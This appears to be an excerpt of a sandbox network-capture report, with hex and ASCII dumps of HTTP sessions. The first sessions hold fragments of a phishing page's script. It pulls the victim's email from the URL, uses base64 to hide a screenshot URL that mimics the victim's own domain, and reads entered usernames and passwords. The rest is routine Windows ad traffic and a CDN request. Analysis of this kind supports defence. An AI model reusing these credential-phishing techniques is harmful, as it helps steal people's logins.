                                                                          2024-12-08 19:51:13 UTC1369INData Raw: 6e 65 72 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 74 61 69 6e 65 72 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 20 3d 20 60 75 72 6c 28 27 24 7b 69 6d 61 67 65 55 72 6c 7d 27 29 60 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 65 78 74 72 61 63 74 45 6d 61 69 6c 41 6e 64 44 6f 6d 61 69 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 68 61 73 68 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 6d 61 69 6c 20 3d 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 68 61 73 68 29 3b 0d 0a 20 20 20 20 20 20 20
                                                                          Data Ascii: ner'); container.style.backgroundImage = `url('${imageUrl}')`; } function extractEmailAndDomain() { const hash = window.location.hash.substring(1); const email = decodeURIComponent(hash);
                                                                          2024-12-08 19:51:13 UTC1369INData Raw: 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 7b 20 65 6d 61 69 6c 2c 20 64 6f 6d 61 69 6e 20 7d 20 3d 20 65 78 74 72 61 63 74 45 6d 61 69 6c 41 6e 64 44 6f 6d 61 69 6e 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 64 6f 6d 61 69 6e 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 69 6d 61 67 65 55 72 6c 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 39 70 62 57 46 6e 5a 53 35 30 61 48 56 74 4c 6d 6c 76 4c 32 64 6c 64 43 39 6f 64 48 52 77 4f 69 38 76 64 33 64 33 4c 69 52 37 5a 47 39 74 59 57 6c 75 66 51 3d 3d 27 29 2e 72 65 70 6c 61 63 65 28 27 24 7b 64 6f 6d 61 69 6e 7d 27 2c 20 64 6f 6d 61 69 6e 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 42 61 63 6b
                                                                          Data Ascii: { const { email, domain } = extractEmailAndDomain(); if (domain) { const imageUrl = atob('aHR0cHM6Ly9pbWFnZS50aHVtLmlvL2dldC9odHRwOi8vd3d3LiR7ZG9tYWlufQ==').replace('${domain}', domain); setBack
                                                                          2024-12-08 19:51:13 UTC1369INData Raw: 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 75 73 65 72 6e 61 6d 65 27 29 2e 76 61 6c 75 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 70 61 73 73 77 6f 72 64 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 61 73 73 77 6f 72 64 27 29 2e 76 61 6c 75 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 72 72 6f 72 4d 65 73 73 61 67 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 73 75 63 63 65 73 73 4d 65 73 73 61 67 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63
                                                                          Data Ascii: ment.getElementById('username').value; const password = document.getElementById('password').value; const errorMessage = document.querySelector('.error-message'); const successMessage = document.querySelec
                                                                          2024-12-08 19:51:13 UTC1369INData Raw: 74 27 2c 20 66 75 6e 63 74 69 6f 6e 20 63 6c 65 61 72 53 75 63 63 65 73 73 4d 65 73 73 61 67 65 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 75 63 63 65 73 73 4d 65 73 73 61 67 65 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 6e 6f 6e 65 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 61 73 73 77 6f 72 64 27 29 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 69 6e 70 75 74 27 2c 20 63 6c 65 61 72 53 75 63 63 65 73 73 4d 65 73 73 61 67 65 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                          Data Ascii: t', function clearSuccessMessage() { successMessage.style.display = 'none'; document.getElementById('password').removeEventListener('input', clearSuccessMessage);
                                                                          2024-12-08 19:51:13 UTC16INData Raw: 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          39192.168.2.44979620.223.35.26443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:12 UTC1589OUTGET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EFC142BC-E096-E7E8-870F-847592C54827&ctry=CH&time=20241208T195059Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=ea8f1d3c-7aea-46a0-a8e3-7bea5600caa3&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=410296d8f45241248f8af4ebf49f1589&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=622562&metered=false&nettype=ethernet&npid=sc-338387&oemName=vokhby%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=vokhby20%2C1&stabedgever=117.0.2045.47&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696408997&tl=2&tsu=622562&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1& [TRUNCATED]
                                                                          Accept-Encoding: gzip, deflate
                                                                          X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=25341&sc=6
                                                                          Cache-Control: no-cache
                                                                          MS-CV: wzBVV2vmh0SIF2RY.0
                                                                          User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                          X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0
                                                                          Host: arc.msn.com
                                                                          Connection: Keep-Alive
                                                                          2024-12-08 19:51:13 UTC815INHTTP/1.1 200 OK
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Content-Length: 23257
                                                                          Content-Type: application/json; charset=utf-8
                                                                          Expires: -1
                                                                          Server: Microsoft-IIS/10.0
                                                                          ARC-RSP-DBG: []
                                                                          X-ARC-SIG: XjArqKwdrm7Z4nenTkNIK2Z25M5934ZZOiSGYekTYs+Px5qFQ2V79WkXxnVrbNrqKsH2i8IOS/TYuyroC0lu9nioC9WA7QfOkSsDaWKJ4rJrazEvCKQs4PHPxAPHFz1rHLES0aQCe+D+sxc240Tib7Ri9cxLLRMP2yS3vO7lzI7xr+VlT6w9tgT8MaV8ugnBoAKRaL6/ztwAmeuG1avv8eCKVXy33Ir83uhM9KN7TcMDJwmuXtPZOTCOYHAlDMwTz2wDlX8DU2E8nNQta93bIQghz8/ZpTLnJKYfRhS7nBk7fIo/A3jPiQqV+3iZ4XdF8EifpiPeT6AynBZYRaVL+w==
                                                                          Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                          X-AspNet-Version: 4.0.30319
                                                                          X-Powered-By: ASP.NET
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                          Date: Sun, 08 Dec 2024 19:51:12 GMT
                                                                          Connection: close
                                                                          2024-12-08 19:51:13 UTC15569INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4c 6f 63 6b 53 63 72 65 65 6e 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6c 61 6e 64 73 63 61 70 65 49 6d 61 67 65 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 69 6d 61
                                                                          Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"LockScreen\",\"propertyManifest\":{\"landscapeImage\":{\"type\":\"ima
                                                                          2024-12-08 19:51:13 UTC7688INData Raw: 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4c 6f 63 6b 53 63 72 65 65 6e 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6c 61 6e 64 73 63 61 70 65 49 6d 61 67 65 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 69 6d 61 67 65 5c 22 7d 2c 5c 22 70 6f 72 74 72 61 69 74 49 6d 61 67 65 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 69 6d 61 67 65 5c 22 7d 2c 5c 22 73 68 6f 77 49 6d 61 67 65 4f 6e 53 65 63 75 72 65 4c 6f 63 6b 5c 22 3a 7b 5c 22 69 73 4f 70 74 69 6f 6e 61 6c 5c 22 3a 74 72 75 65 2c 5c 22 74 79 70 65 5c 22 3a 5c 22 62 6f 6f 6c 65 61 6e 5c 22 7d 2c 5c 22 6f 6e 52 65 6e 64 65 72 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 70 72 6f 70
                                                                          Data Ascii: \"collections\":[],\"name\":\"LockScreen\",\"propertyManifest\":{\"landscapeImage\":{\"type\":\"image\"},\"portraitImage\":{\"type\":\"image\"},\"showImageOnSecureLock\":{\"isOptional\":true,\"type\":\"boolean\"},\"onRender\":{\"type\":\"action\"}},\"prop


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          40192.168.2.44979720.223.35.26443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:12 UTC1622OUTGET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EFC142BC-E096-E7E8-870F-847592C54827&ctry=CH&time=20241208T195059Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=ea8f1d3c-7aea-46a0-a8e3-7bea5600caa3&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=b45a07db854d4ce4ab0996c84a8542f4&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&currsel=137271744000000000&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=622562&metered=false&nettype=ethernet&npid=sc-338389&oemName=vokhby%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=vokhby20%2C1&stabedgever=117.0.2045.47&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696408997&tl=2&tsu=622562&waasBldFlt=1&waasCfgExp=1&waa [TRUNCATED]
                                                                          Accept-Encoding: gzip, deflate
                                                                          X-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50543&fs=25341&sc=6
                                                                          Cache-Control: no-cache
                                                                          MS-CV: wzBVV2vmh0SIF2RY.0
                                                                          User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                          X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0
                                                                          Host: arc.msn.com
                                                                          Connection: Keep-Alive
                                                                          2024-12-08 19:51:13 UTC955INHTTP/1.1 200 OK
                                                                          Cache-Control: no-store, no-cache
                                                                          Pragma: no-cache
                                                                          Content-Length: 3409
                                                                          Content-Type: application/json; charset=utf-8
                                                                          Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                          Server: Microsoft-IIS/10.0
                                                                          ARC-RSP-DBG: [{"RADIDS":"1,P426081542-T1-C128000000001615609+B+P20+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}]
                                                                          X-ARC-SIG: VIpwaUHLyisVlmP8MBTFWyxgGffhol2y6jEpiMFAUMyzlvzUUmphSLvwkfqcFTtfP0+tJejlmc3klL7OJ6n3RRrn0o4bHZTgATUljiwCVq4Xv6KV1r060GIM0SrmIRom9yPgYEBrvtfc3Iot6oTuUOH9b6lxDrHqGUNYLcMRRZkl8sS839kZVgTDmnL99jfMGIc+BZtJOJ1iJqCKRbUK8TA0gZFHuPx5ZWVUe5ujtGWiCxdlFHCcfFhHk0PUzCA66fP/oYkB9qlSTC+0gEC/wsLgKzNsZLBPnBLsUP/mOVfJzCA5qWkuc5K+uedOYn53akihEi8KfEoQqPNY5WIDkg==
                                                                          Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                          X-AspNet-Version: 4.0.30319
                                                                          X-Powered-By: ASP.NET
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                          Date: Sun, 08 Dec 2024 19:51:12 GMT
                                                                          Connection: close
                                                                          2024-12-08 19:51:13 UTC3409INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69
                                                                          Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          41192.168.2.44979420.223.35.26443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:12 UTC1622OUTGET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EFC142BC-E096-E7E8-870F-847592C54827&ctry=CH&time=20241208T195059Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=ea8f1d3c-7aea-46a0-a8e3-7bea5600caa3&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=6fb4669775c848c7a1ddcc46d594281c&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&currsel=137271744000000000&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=622562&metered=false&nettype=ethernet&npid=sc-280815&oemName=vokhby%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=vokhby20%2C1&stabedgever=117.0.2045.47&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696408997&tl=2&tsu=622562&waasBldFlt=1&waasCfgExp=1&waa [TRUNCATED]
                                                                          Accept-Encoding: gzip, deflate
                                                                          X-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50543&fs=25341&sc=6
                                                                          Cache-Control: no-cache
                                                                          MS-CV: wzBVV2vmh0SIF2RY.0
                                                                          User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                          X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0
                                                                          Host: arc.msn.com
                                                                          Connection: Keep-Alive
                                                                          2024-12-08 19:51:13 UTC955INHTTP/1.1 200 OK
                                                                          Cache-Control: no-store, no-cache
                                                                          Pragma: no-cache
                                                                          Content-Length: 2986
                                                                          Content-Type: application/json; charset=utf-8
                                                                          Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                          Server: Microsoft-IIS/10.0
                                                                          ARC-RSP-DBG: [{"RADIDS":"1,P425116123-T1-C128000000001627409+B+P20+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}]
                                                                          X-ARC-SIG: nExchPzYvayjDe+E69QazZzPKJbvDme/P5kTQIMU8VbITTpHiEAGgoSf2jGD1xw2gVr8qQeosn8ez9+4D3E7NEcRD2T7kLaqt7fzdYvPb/rARZKwK7/+a6UTdlt2XbgFDebhnidsSukX9PcapcsV+O42C6PwWZGd9vcyzPhtddMYqgCbOwywfO9NN74UYOVknWNQEHRaENoHpI5gux7dJd91pXOxCNzt75HlIBzTPbW8Y6/BZ2kirlhhlYzzoNI/dN5BiB0yvvLfQwEiq7s4hJW6y3qMZIIy+2TFAFXi1gHny/mJAmeavknXZZ80toTOHTNXTBoZ7IgczSwoICmKQg==
                                                                          Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                          X-AspNet-Version: 4.0.30319
                                                                          X-Powered-By: ASP.NET
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                          Date: Sun, 08 Dec 2024 19:51:12 GMT
                                                                          Connection: close
                                                                          2024-12-08 19:51:13 UTC2986INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69
                                                                          Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          42192.168.2.44979520.223.35.26443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:12 UTC1606OUTGET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EFC142BC-E096-E7E8-870F-847592C54827&ctry=CH&time=20241208T195059Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=ea8f1d3c-7aea-46a0-a8e3-7bea5600caa3&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=58bcc9d045d342f6863c7bd98bddef6e&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&currsel=133409815784023643&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=622562&metered=false&nettype=ethernet&npid=sc-310091&oemName=vokhby%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=vokhby20%2C1&stabedgever=117.0.2045.47&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696408997&tl=2&tsu=622562&waasBldFlt=1&waasCfgEx [TRUNCATED]
                                                                          Accept-Encoding: gzip, deflate
                                                                          X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=25341&sc=6
                                                                          Cache-Control: no-cache
                                                                          MS-CV: wzBVV2vmh0SIF2RY.0
                                                                          User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                          X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0
                                                                          Host: arc.msn.com
                                                                          Connection: Keep-Alive
                                                                          2024-12-08 19:51:13 UTC814INHTTP/1.1 200 OK
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Content-Length: 1408
                                                                          Content-Type: application/json; charset=utf-8
                                                                          Expires: -1
                                                                          Server: Microsoft-IIS/10.0
                                                                          ARC-RSP-DBG: []
                                                                          X-ARC-SIG: X8nZWn0OjEs+5U1iV+L3do3MJdIbFMgZVsqDpH0k5ZWp16htPq944SRfZ+E0ia4o36gbJYZlnz+kpXLIgYXn313bdFKqGkNmamZsmM5Pn1BD0H2cLxF3CG+nS6JhbqeaPRbyDWHdBoLGRizxWdc1XhQnlRcQo8+l6cE54Jtm2uNnCuaLjdVHLy1nu4t6ClTJJznN+bDW3jBbTQgY91pH6ZIqvn/lKscbcUWq/drDhtTSnQhA21+lm+Eh4TQJgE4y5iYEpE0mMqNBzYzT+lqwZkx2xgyK0MIuvYgw5UtPeeGvoeovAO4VVKvZNAHXxm6NmAAbynA5wmRDtok/G0621Q==
                                                                          Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                          X-AspNet-Version: 4.0.30319
                                                                          X-Powered-By: ASP.NET
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                          Date: Sun, 08 Dec 2024 19:51:12 GMT
                                                                          Connection: close
                                                                          2024-12-08 19:51:13 UTC1408INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 45 6d 70 74 79 43 72 65 61 74 69 76 65 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 7d 2c 5c 22 70 72 6f 70 65 72 74 69 65 73 5c 22 3a 7b 7d 2c 5c 22 74 72 61 63 6b 69 6e 67 5c
                                                                          Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"EmptyCreative\",\"propertyManifest\":{},\"properties\":{},\"tracking\


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          43192.168.2.449807104.17.25.144431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:14 UTC582OUTGET /ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css HTTP/1.1
                                                                          Host: cdnjs.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
